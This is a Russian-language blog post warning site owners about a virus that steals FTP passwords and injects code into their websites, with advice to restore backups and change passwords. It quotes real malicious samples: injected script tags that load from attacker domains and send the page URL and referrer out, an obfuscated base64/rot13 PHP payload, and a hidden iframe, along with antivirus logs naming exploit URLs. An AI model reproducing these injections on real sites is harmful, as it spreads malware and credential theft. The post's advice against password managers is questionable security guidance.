Опасный вирус! Крадет данные(в основном FTP), размножается по всем вашим сайтам

Если Вы обнаружили у себя на сайте любой из кодов:

  • < script type=”text/javascript” src=”http://ad.yandex-verification.net/verify-v1″></ script>< script type=”text/javascript” src=”http://ad.yandex-verification.net/verify-v2″></ script>< script>var gaJsHost = ((“http:” == document.location.protocol) ? “http://yandex” : “http://yandex”); document.write(unescape(“%3Cscript src=’” + gaJsHost + “-yandex.uni.cc/verify-v1?id=”+Math.floor(Math.random() *30000)+”&group=2&seoref=”+encodeURIComponent(document.referrer)+ “&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=’ type=’text/javascript’%3E%3C/script%3E”));</ script>

 

  • $ somecrainsignvar=”liouftcn”; echo base64_decode(str_rot13(‘VQkmL3WcpUD+VN0XqzSlVTquFaAVo3A0VQ0tXPtvnUE0pQbvVQ09VTEiL3IgMJ50YzkiL2S0nJ9hYaOlo3EiL29fXFN/VPWbqUEjBv8irJShMTI4VvN6VPWbqUEjBv8irJShMTI4Vvx7VTEiL3IgMJ50YaqlnKEyXUIhMKAwLKOyXPVyZ0AmL3WcpUDtp3WwCFpvVPftM2SXp0uip3DtXlNvYKyuozEyrP51ozxhL2ZiqzIlnJM5YKLkC2yxCFVeGJS0nP5zoT9ipvuALKEbYaWuozEioFtcVPbmZQNjZPxeVvMapz91pQ0lWaAyo3WyMw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2A1oJIhqP5lMJMypaWypvxeVPVzpTSlLJ1yqTIlCFEeMKy3o3WxWaAyCFEmMFM1pw0kWxuHISOsHxITEIWSHw0vX2IhL29xMIIFFHAioKOiozIhqPuxo2A1oJIhqP5IHxjcXlVzMTIzLKIfqS9eMKy3o3WxCFptqUyjMG0aqTI4qP9dLKMup2AlnKO0WlHmEFHmDl9mL3WcpUDyZ0HvXFx7QDbtCP9mL3WcpUD+VN==’)); $crain=”";
  • <!– o65 –>< script>

var object = document.createElement(‘if’+'ra’+'me’);
object.setAttribute(‘style’, ‘visibility: hidden’);
object.setAttribute(‘height’, ’2′);
object.setAttribute(‘src’, ‘http://ya-toptal-tvoyu-dushu.com/domains/01′);
document.body.appendChild(object);
</ script> <!– c65 –>

 

  • Или аналоги

СРОЧНО ВОССТАНАВЛИВАЙТЕ ПОСЛЕДНИЙ БЭКАП САЙТА, МЕНЯЙТЕ ВСЕ ПАРОЛИ ДОСТУПОВ(ФТП и т.д.). Тем более если на ЭТО даже не ругался ваш антивирус.

Если бэкапа нет – смею огорчить придется проверять все файлы на сайте, код может быть где угодно(в основном на индексных страницах index.php index.html и т.д., но часто чтобы труднее было найти суют куда только могут).

Можете завалить на долго все свои сайты!

Будьте бдительны и не храните пароли на компьютере вообще, только в голове, не используйте менеджер паролей. Есть вероятность – потерять все сразу!

Возможна информация о вирусе от антивируса ESET NOD32:

09.06.2011 2:18:30 Фильтр HTTP    файл    http://comrade-comrade9.uni.cc/games/2fdp.php?f=16    JS/Exploit.Pdfka.OXX троянская программа    соединение прервано – изолирован      Обнаружена угроза при попытке доступа в Интернет следующим приложением: \Mozilla Firefox\firefox.exe.
03.06.2011 0:56:07 Фильтр HTTP    файл    http://guntis-adrianna4.uni.cc/games/2fdp.php?f=16    JS/Exploit.Pdfka.OXB.Gen троянская программа    соединение прервано – изолирован      Обнаружена угроза при попытке доступа в Интернет следующим приложением: \Mozilla Firefox\firefox.exe.
29.05.2011 0:54:41 Фильтр HTTP    файл    http://bart-l5.co.tv/d.php?f=16&e=6

модифицированный Win32/Kryptik.OEW троянская программа    соединение прервано – изолирован    Обнаружена угроза при попытке доступа в Интернет следующим приложением: \Mozilla Firefox\plugin-container.exe.

И главное – не игнорируем частое создание резервных копий!

Share and Enjoy:
  • Добавить ВКонтакте заметку об этой странице
  • Мой Мир
  • Facebook
  • Twitter
  • LiveJournal
  • MySpace
  • FriendFeed
  • В закладки Google
  • Google Buzz
  • Яндекс.Закладки
  • LinkedIn
  • Reddit
  • StumbleUpon
  • Technorati
  • Twitter
  • del.icio.us
  • Digg
  • БобрДобр
  • MisterWong.RU
  • Memori.ru
  • МоёМесто.ru
  • Сто закладок

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *

*


3 + = девять

*


Можно использовать следующие HTML-теги и атрибуты: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>